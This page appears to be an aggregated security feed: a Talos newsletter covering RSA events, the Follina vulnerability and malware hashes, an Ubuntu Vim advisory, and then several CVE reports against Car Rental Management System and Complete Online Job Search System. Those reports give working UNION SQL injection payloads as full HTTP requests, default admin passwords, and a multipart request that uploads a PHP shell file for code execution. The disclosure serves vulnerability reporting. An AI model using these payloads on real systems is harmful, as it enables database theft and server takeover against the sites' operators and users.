By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we’re right behind you!  
Talos...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we’re right behind you!  

Talos will have plenty of representation at both conferences, including giving lightning talks at the Cisco Secure booth, several features talks and spots, live podcast recordings, and more. To get you ready for RSA, I wanted to highlight a few special things we’re doing at the conference you should know about before you go.  

As always, you can keep posted on our latest plans and talk schedule by following us on Twitter. 

**Main booth** 

Stop by the main Talos and Cisco Secure booth at Moscone North Hall to say hi, ask questions and get the latest information on what we’re up to. 

At the booth, we’ll be premiering a new video series and giving out some of our newest stickers created in the image of our favorite malware “mascots.” Everyone will be jealous if you have one of these on your laptop. 

**Evolving Your Defense: Making Heads or Tails of Threat Actor Trends** 

Nick Biasini and Pierre Cadieux are hosting our sponsored session on June 7 at 9:40 a.m. PT. In this talk, they’ll be breaking down the latest threat actor tactics, techniques and procedures and telling you which ones you should be worried about and what can be ignored. 

**Beers with Talos/Security Stories** 

We’re hosting two live podcasts back-to-back at the Marriott Marquis: Sierra C ballroom from 2 – 5 p.m. PT on June 7. Security Stories and Beers with Talos are getting together to play a game of “Would I lie to you?”  

Talos’ vice president, Matt Watchinski, will be on hand for both episodes, along with other special guests.  

The Beers with Talos episode will cover Talos’ work in Ukraine, and we’ll hear from the audience about their hottest security takes.  

**The one big thing **

A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. CVE-2022-30190, also known under the name "Follina," exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft Word or via an RTF file. An attacker could exploit this vulnerability to gain the ability to run arbitrary code on the targeted system. 

  

> **Why do I care? **
> 
> If an attacker were to successfully exploit this vulnerability, they could execute remote code on the targeted machine. Needless to say, that’s bad. This is just the latest in a string of Microsoft vulnerabilities to make headlines over the past 12 months, including PrintNightmare and multiple Exchange Server issues. If those cases have taught us anything, it’s that attackers aren’t afraid to look for vulnerable Microsoft products to try and gain a foothold on a targeted network or machine.  
> 
> **So now what? **Although a patch hasn't been released yet, Microsoft has provided workarounds and Windows Defender protections for the CVE and malware exploiting this vulnerability. Cisco Talos has also released coverage to protect against this vulnerability, including multiple Snort rules and a ClamAV signature.   

**Other news of note**

Costa Rica’s government was hit with another ransomware attack, this time from the Hive group. Hive took down the country’s health department’s online services earlier this week, adding to the problems Costa Rica is facing after Conti launched a ransomware attack in May. Security experts say there is evidence that Conti and Hive may be working together to extort the Costa Rican government. This is all going on as the Conti group claims it’s shutting down and splitting up into smaller groups. The Hive operators have not yet declared a ransom amount. (Bleeping Computer, Krebs on Security, CSO Online) 

The U.S. Department of Justice seized three domains associated with selling and collecting stolen and leaked personal information. Authorities said the sites, WeLeakInfo, IPStress and OVH Booster all assisted attackers in carrying out denial-of-service attacks. In 2020, the DoJ seized very similar domains, including “weleakinfo.com,” which at the time, offered users the ability to “review and obtain the personal information illegally obtained in over 10,000 data breaches.” (Recorded Future, Department of Justice) 

The FBI recently thwarted an attempted cyber attack on a Boston children’s hospital, according to the agency’s director. Chris Wray, speaking at an event in Boston, received intelligence last summer ahead of time that allowed the agency to stop what he called “one of the most despicable cyberattacks I've seen.” Wray added that the attack came from an Iranian state-sponsored actor. The same hospital faced similar attacks in 2014 and 2019, he said. (ABC News, NBC 10 Boston) 

**Can’t get enough Talos? **

*   Researcher Spotlight: Martin Lee, EMEAR lead, Talos Strategic Communications
*   Threat Roundup for May 20 - 27
*   Talos Takes Ep. #98: Maybe don't panic about that F5 BIG-IP vulnerability

  

**Upcoming events where you can find Talos ****REcon (June 3 – 5, 2022)  
Montreal, Canada ****RSA 2022 (June 6 – 9, 2022)  
San Francisco, California ****Cisco Live U.S. (June 12 – 16, 2022)  
Las Vegas, Nevada ****Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  **MD5:** 93fefc3e88ffb78abb36365fa5cf857c  **Typical Filename:** Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645    **MD5:** 2c8ea737a232fd03ab80db672d50a17a    **Typical Filename:** LwssPlayer.scr      
**Claimed Product:** 梦想之巅幻灯播放器      
**Detection Name:** Auto.125E12.241442.in02    

**SHA 256:** 4b34e3637fa7af93ab628ae5adad2c7f3464053316963297844324a4f649a206   
**MD5:** 3632f27604f5a82cf73b9ade710a1656  **Typical Filename:** mediaget\_installer\_467.exe    
**Claimed Product:** N/A    
**Detection Name:** FileRepPup:MediaGet-tpd  

**SHA 256:** a9f7d7525aad1c7007ae9d1d3fc531a1065b28225c5b7efb7347aaf77d9aba92    
**MD5:** 8f90e544a48d75f42f9d44811320689c   **Typical Filename:** tata communications wholesale retai lpak ncl ethopia napal spice srilanka bd cli bangladesh.wsf    
**Claimed Product:** N/A     
**Detection Name:** Xml.Dropper.Valyria::100.sbx.vioc  

**SHA 256:** 85B936960FBE5100C170B777E1647CE9F0F01E3AB9742DFC23F37CB0825B30B5   **MD5:** 8c80dd97c37525927c1e549cb59bcbf3   **Typical Filename:** Eternalblue-2.2.0.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Exploit.Shadowbrokers::5A5226262.auto.talos

Threat Source newsletter (June 2, 2022) — An RSA Conference primer

Ubuntu Security Notice 5458-1 - It was discovered that Vim was incorrectly handling virtual column position operations, which could result in an out-of-bounds read. An attacker could possibly use this issue to expose sensitive information. It was discovered that Vim was not properly performing bounds checks when updating windows present on a screen, which could result in a heap buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5458-1June 02, 2022vim vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim was incorrectly handling virtual columnposition operations, which could result in an out-of-bounds read. Anattacker could possibly use this issue to expose sensitiveinformation. (CVE-2021-4193)It was discovered that Vim was not properly performing bounds checkswhen updating windows present on a screen, which could result in aheap buffer overflow. An attacker could possibly use this issue tocause a denial of service or execute arbitrary code. (CVE-2022-0213)It was discovered that Vim was incorrectly handling windowexchanging operations when in Visual mode, which could result in anout-of-bounds read. An attacker could possibly use this issue toexpose sensitive information. (CVE-2022-0319)It was discovered that Vim was incorrectly handling recursion whenparsing conditional expressions. An attacker could possibly use thisissue to cause a denial of service or execute arbitrary code.(CVE-2022-0351)It was discovered that Vim was not properly handling memoryallocation when processing data in Ex mode, which could result in aheap buffer overflow. An attacker could possibly use this issue tocause a denial of service or execute arbitrary code.(CVE-2022-0359)It was discovered that Vim was not properly performing bounds checkswhen executing line operations in Visual mode, which could result ina heap buffer overflow. An attacker could possibly use this issue tocause a denial of service or execute arbitrary code.(CVE-2022-0361, CVE-2022-0368)It was discovered that Vim was not properly handling loop conditionswhen looking for spell suggestions, which could result in a stackbuffer overflow. An attacker could possibly use this issue to causea denial of service or execute arbitrary code. (CVE-2022-0408)It was discovered that Vim was incorrectly handling memory accesswhen executing buffer operations, which could result in the usage offreed memory. An attacker could possibly use this issue to executearbitrary code. (CVE-2022-0443)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   vim                             2:7.4.1689-3ubuntu1.5+esm5In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5458-1   CVE-2021-4193, CVE-2022-0213, CVE-2022-0319, CVE-2022-0351,   CVE-2022-0359, CVE-2022-0361, CVE-2022-0368, CVE-2022-0408,   CVE-2022-0443

Ubuntu Security Notice USN-5458-1

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/manage_user.php?id=.

Permalink

Cannot retrieve contributors at this time

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/manage\_user.php?id=

Vulnerability location: /car-rental-management-system/admin/manage\_user.php?id=,id

\[+\] Payload: /car-rental-management-system/admin/manage\_user.php?id=-1%20union%20select%201,database(),3,4,5--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/manage\_user.php?id\=\-1%20union%20select%201,database(),3,4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32028: bug_report/SQLi-8.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/index.php?page=manage_car&id=.

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/index.php?page=manage\_car&id=

Vulnerability location: /car-rental-management-system/admin/index.php?page=manage\_car&id=,id

\[+\] Payload: /car-rental-management-system/admin/index.php?page=manage\_car&id=-6%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/index.php?page\=manage\_car&id\=\-6%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32027: bug_report/SQLi-7.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/manage_booking.php?id=.

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/manage\_booking.php?id=

Vulnerability location: /car-rental-management-system/admin/manage\_booking.php?id=,id

\[+\] Payload: /car-rental-management-system/admin/manage\_booking.php?id=-1%20union%20select%201,2,3,4,5,6,database(),8,9,10,11--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/manage\_booking.php?id\=\-1%20union%20select%201,2,3,4,5,6,database(),8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32026: bug_report/SQLi-5.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/manage_movement.php?id=.

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/manage\_movement.php?id=

Vulnerability location: /car-rental-management-system/admin/manage\_movement.php?id=,id

\[+\] Payload: /car-rental-management-system/admin/manage\_movement.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16,17--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/manage\_movement.php?id\=\-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16,17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32021: bug_report/SQLi-3.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to Arbitrary code execution via ip/car-rental-management-system/admin/ajax.php?action=save_settings.

Permalink

Cannot retrieve contributors at this time

**Car Rental Management System v1.0 has arbitrary code execution (RCE)**

vendor: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability url: ip/car-rental-management-system/admin/ajax.php?action=save\_settings

Request package for file upload：

POST /car\-rental\-management\-system/admin/ajax.php?action\=save\_settings HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/car-rental-management-system/admin/index.php?page=site\_settings
Content-Length: 1636
Content-Type: multipart/form-data; boundary=---------------------------218441699924310
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close
\-----------------------------218441699924310
Content-Disposition: form-data; name="name"
Car Rental Management System
\-----------------------------218441699924310
Content-Disposition: form-data; name="email"
info@sample.comm
\-----------------------------218441699924310
Content-Disposition: form-data; name="contact"
+6948 8542 623
\-----------------------------218441699924310
Content-Disposition: form-data; name="about"
&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industryâ��s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. 
\-----------------------------218441699924310
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------218441699924310--

The files will be uploaded to this directory \\admin\\assets\\uploads 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32020: bug_report/RCE-2.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/view_car.php?id=.

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/view\_car.php?id=

Vulnerability location: /car-rental-management-system/admin/view\_car.php?id=,id

\[+\] Payload: /car-rental-management-system/admin/view\_car.php?id=-6%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/view\_car.php?id\=\-6%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32025: bug_report/SQLi-6.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to SQL Injection via car-rental-management-system/booking.php?car_id=.

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: car-rental-management-system/booking.php?car\_id=

Vulnerability location: car-rental-management-system/booking.php?car\_id=,car\_id

\[+\] Payload: car-rental-management-system/booking.php?car\_id=-1%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> car\_id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/booking.php?car\_id\=\-1%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32024: bug_report/SQLi-4.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=result&searchfor=byfunction.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/index.php?q=result&searchfor=byfunction

Vulnerability location: /eris/index.php?q=result&searchfor=byfunction,SEARCH

Current database name: erisdb

\[+\] Payload: SEARCH=9890') union select 1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+&CATEGORY=&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2 // Leak place ---> SEARCH

POST /eris/index.php?q\=result&searchfor\=byfunction HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
SEARCH=9890') union select 1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+&CATEGORY=&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

Tag

#windows